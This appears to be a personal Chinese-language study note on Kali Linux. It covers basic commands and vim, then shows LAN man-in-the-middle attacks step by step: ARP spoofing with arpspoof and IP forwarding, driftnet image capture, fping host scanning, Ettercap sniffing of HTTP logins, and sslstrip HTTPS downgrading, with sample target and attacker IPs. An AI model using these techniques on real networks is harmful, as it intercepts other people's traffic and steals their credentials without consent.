##Linux 基础
1. 搭建了kali,无法联网是因为校园网锐捷客户端会自动关闭vm nat 服务 使用时关闭锐捷重新打开NAT服务
2. linux基础命令
·reboot 重新启动 ·shutdown -h now 关机 ·shutdown -r now 重启
·apt-get update(更新)/install(安装)
·find / -name sqlmap (从根目录开始查找出现name参数(sqlmap)的文件夹)
ifconfig 查看网络ip ::::::::::(网卡:, ip:1
windows(本机):
3. arp攻击(局域网断网攻击)需关闭来宾网络防火墙!!
Arpspoof工具-------------->欺骗
arpspoof -i 网卡 -t目标ip 网关 (截断流量
arp欺骗:echo 1 >/proc/sys/net/ipv4/ip_forward(转移流量是流量能从我的网关出去)
查看网卡流量中图片信息 driftnet -i eth0
查看局域网中ip:fping -asg 192.168.0.0/24
###http流量嗅探
Ettercap工具 ----------------->欺骗 DNS欺骗 流量嗅探 (抓包)
可获取用户输入盗取账号密码(仅用于http协议)((玩耍专用=-=
实战:
目标机器 : 192.168.0.103 网关:192.168.0.1
kali 攻击者:192.168.0.120
开启ip转发:
cat查看内容
回显为1则ip转发成功
使用arpspoof -i -t开启欺骗
ettercap -Tq -i 开启流量嗅探便能嗅探到目标机器上http流量
###https流量嗅探
ssh工具:/etc/init.d/ssh start 开启ssh
sslstrip > https的连接还原为http
-a -f -k
vim 文本编辑器 命令:vim + 文件名:
退出:ESC 然后 shift + :输入q!不保存退出
wq:保存退出
i 插入模式
打开/etc/ettercap/etter.conf修改了文件
